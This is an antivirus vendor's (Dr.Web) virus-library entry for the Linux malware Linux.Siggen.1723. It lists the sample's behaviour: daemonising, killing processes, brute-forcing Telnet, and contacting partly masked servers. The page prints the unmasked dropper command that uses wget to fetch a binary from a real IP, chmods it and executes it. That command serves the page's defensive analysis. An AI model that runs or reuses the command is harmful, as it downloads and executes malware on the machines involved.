FOR CUSTOMERS

My library

+ Add to library

Search

24/7 Tech support | Rules regarding submitting

Send a message

Call us

+7 (495) 789-45-86

Forum

Your tickets

Total: -
Active: -
Latest: -

Call us

+7 (495) 789-45-86

EN

RU CN DE EN ES FR IT JP KZ UZ PL BY

Support services

Dr.Web vxCube

Sign in to Dr.Web vxCube

VCI investigations

Virus library

Knowledge base

Technologies

Terminology

Training and education

Myths

Myths about anti-viruses

Linux.Siggen.1723

Added to the Dr.Web virus database: 2019-05-19

Virus description added: 2019-05-18

Technical Information

Malicious functions:

Removes itself

Launches itself as a daemon

Substitutes application name for:

enFsoFeaeoooToo

Launches processes:

/bin/sh -c wget http://185.244.25.160/hahdshd73ahshds73/ugei7; chmod 777 *; ./ugei7 wget.arm7
wget http://185.244.25.160/hahdshd73ahshds73/ugei7
chmod 777 run.sh stdout.log ugei7
./ugei7 wget.arm7

Kills the following processes:

exim4
bash
run.sh
/root/ugei7

Performs operations with the file system:

Modifies file access rights:

/root/run.sh
/root/ugei7

Creates or modifies files:

/root/ugei7

Deletes files:

/root/ugei7

Network activity:

Awaits incoming connections on ports:

127.0.0.1:17110

Establishes connection:

8.#.8.8:53
18#.##4.25.160:6574

Attacks using a special dictionary (brute-force technique) via the Telnet protocol.

HTTP GET requests:

18#.###.##.160/hahdshd73ahshds73/ugei7

Sends data to the following servers:

18#.##4.25.160:6574
74.#.177.118:23
99.##.225.223:23
21#.#.111.63:23
42.##.144.180:23
19#.##.148.228:23
19#.##4.125.74:23
13#.##.139.121:23
17#.##.251.40:23
18.###.219.71:23
16#.#4.35.14:23

Receives data from the following servers:

18#.##4.25.160:6574

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number